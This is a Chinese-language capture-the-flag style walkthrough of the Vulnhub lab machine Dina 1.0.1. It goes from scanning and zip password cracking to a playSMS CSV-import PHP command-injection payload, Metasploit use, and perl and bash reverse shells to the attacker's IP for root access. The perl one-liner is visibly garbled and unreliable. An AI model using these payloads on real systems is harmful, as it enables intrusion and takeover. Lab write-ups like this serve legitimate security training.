靶机渗透测试(Dina: 1.0.1):
Vulnhub靶机 Dina: 1.0.1
靶机:修改靶机的网络配置为桥接模式。
攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机。
靶机难度:(Beginner (IF YOU STUCK ANYwhere PM me for HINT, But I don’t think need any help).)
描述:/root/flag.txt
渗透流程:
1. 探测靶机ip地址(netdiscover -i eth0 -r 网关)
命令:netdiscover -i eth0 -r 192.168.10.0
靶机ip为: 192.168.10.133
2. nmap进行靶机端口服务扫描
命令: nmap -sS -Pn -A -p- -n 192.168.10.133
靶机只开放了80/http端口服务!(且存在robots目录)
3. 根据端口服务进行信息收集(80/http端口)
访问80页面进行信息收集:
3.1. dirb目录扫描
我们使用kali中的dirb工具,对靶机页面进行目录扫描,可以看到爆破出来了敏感目录,例如:robots、tmp、uploads
我们首先访问robots页面,可以看到不被允许访问的页面有5项:
逐一访问页面,在nothing页面,看到不同(not found):
ctrl+u查看一波源代码:得到一份密码本(5个字符串)(备份保存)
3.2. 访问/secure页面(访问非空目录)
继续访问其他敏感目录,在/secure页面得到一项zip文件:
我们使用kali下载下来,但解压时发现需要密码,这时刚刚nothing页面得到的密码本就可以排上用场了,我们使用密码本爆破,得到密码:freedom
成功解压,发现文件是mp3文件,但文件已经损坏,无法播放!!!
我们直接使用记事本打开(或者kali终端直接cat查看),在MP3文件中得到一项url地址:/SecreTSMSgatwayLogin(且给出了账号为touhid)
4. 信息收集(Playsms框架)
访问得到的url地址:(可以看到为Playsms框架)
用户名/密码: touhid /// diana
密码仍然为使用密码本爆破
登陆成功!
我们使用kali直接先search一波,查看下框架版本信息:
searchsploit playsms:
cat查看42044.txt文件,按照文档说明,我们可以生成一个csv文件,抓包传参;文档中给出了上传的脚本和信息,可以在user-agent中执行命令;
那么我们就可以在playsms框架上寻找到可以upload(文件上传)的地址,上传CSV文件,利用burp抓包修改参数,从而getshell;
5. Getshell(漏洞利用)
方式一. exp漏洞利用
使用msf查看框架漏洞:
打开msf:
search playsms:
show options 查看配置信息
使用set命令设置配置信息:
set PASSWORD diana
set USERNAME touhid
set TARGETURI SecreTSMSgatwayLogin (TARGETURI是上传文件页面的URI)
set RHOST 192.168.10.133(靶机ip)
set LHOST 192.168.10.9(kali监听机的ip)
set LPORT 1234(kali监听的端口)
成功获得meterpreter,输入shell:
使用sudo -l命令查看可提权文件,发现可以执行perl命令,(所有用户均可以执行)
通过perl写入反向shell语句,命令如下:
sudo perl -e ‘use Socket; i = " 192.168.10.9 " ; i="192.168.10.9"; i="192.168.10.9";p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in( p , i n e t a t o n ( p,inet_aton( p,inetaton(i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};’
因为我们前面在得到meterpreter时,已经监听了4444端口,所以本次不能再重复使用,否则会报错4444端口已经被占用!
nc监听1234端口,成功获取到目标机器shell,whoami查看为root管理员权限,进行root/flag.txt查看:得到flag。
实验成功!!!
方式二 . 利用漏洞建立反弹shell(命令执行漏洞)
查看Import File的漏洞文档,发现文档中给出了利用方法:
需要在导入的 CSV 文件中填入以下内容:
name:<?php $t=$_SERVER['HTTP_USER_AGENT']; system($t); ?>
mobile:22
此时导入该 CSV文件,抓包修改User-Agent的值为任意命令,即可执行。
Phonebook板块有一个导入文件并识别CSV文件内容的功能,即导入一个测试文件,页面会回显文件内容:
导入csv文件,然后抓包,尝试修改User-Agent,结果会返回执行结果:
当然我们也可以直接修改NAME值,然后直接键入php提权命令:
因此我们就可以建立反弹shell并提权:
修改User-Agent为创建反弹shell的命令:
echo ‘bash -i>&/dev/tcp/192.168.10.9/1234 0>&1’ | bash
kali上监听1234端口,再次发包即可得到getshell;
成功反弹shell!!!(提权部分与上文相同,也可以使用脏牛提权,靶机下载dirty.c脚本,gcc编译,修改passwd文件,切换用户,成功提权!)
实验总结:
在本次实验中信息搜集得到仅开放的80端口,以及对robots协议的了解和robots目录下的不被允许访问的目录;
访问robots文件得到密码本,为后续解开mp3压缩包文件提供了很有利的帮助,在MP3文件损坏后,及时使用记事本查看,得到了playSMS登陆地址与用户名;
利用给出的用户名和robots文件中的密码进入系统,发现两处命令执行漏洞;
提权部分,我们可以使用手工利用和使用MSF利用漏洞,以及脏牛提权。
在实验中,CVS上传漏洞是本次的新颖知识!!!
参考博客:
https://blog.csdn.net/qq_43968080/article/details/105351336
274
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
